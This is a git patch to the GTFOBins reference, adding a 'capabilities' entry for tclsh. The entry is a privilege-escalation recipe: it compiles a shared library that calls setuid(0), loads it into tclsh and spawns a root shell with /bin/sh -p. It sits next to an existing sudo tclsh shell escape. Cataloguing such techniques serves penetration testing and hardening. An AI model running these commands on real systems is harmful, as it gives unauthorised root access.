From 897f6781330700c6931af3926b2ec8705a9d3ff5 Mon Sep 17 00:00:00 2001
From: Nikitin Timofey <63474188+12345qwert123456@users.noreply.github.com>
Date: Fri, 4 Oct 2024 15:45:58 +0300
Subject: [PATCH] Add capabilities to tclsh.md

---
 _gtfobins/tclsh.md | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md
index 6db0c67f..128f1528 100644
--- a/_gtfobins/tclsh.md
+++ b/_gtfobins/tclsh.md
@@ -18,4 +18,11 @@ functions:
     - code: |
         sudo tclsh
         exec /bin/sh <@stdin >@stdout 2>@stderr
+  capabilities
+   - code: |
+        echo -e '#include <tcl.h>\n#include <unistd.h>\nint SetUidCmd(ClientData, Tcl_Interp *interp, int, const char **) { return setuid(0) == -1 ? (Tcl_SetResult(interp, "Failed to set UID", TCL_STATIC), TCL_ERROR) : TCL_OK; } int Setuid_Init(Tcl_Interp *interp) { Tcl_CreateCommand(interp, "setuid", SetUidCmd, NULL, NULL); return TCL_OK; }' | gcc -shared -o setuid.so -fPIC -I/usr/include/tcl8.6 -ltcl -x c -
+        ./tclsh
+        load ./setuid.so
+        setuid
+        exec /bin/sh -p <@stdin >@stdout 2>@stderr
 ---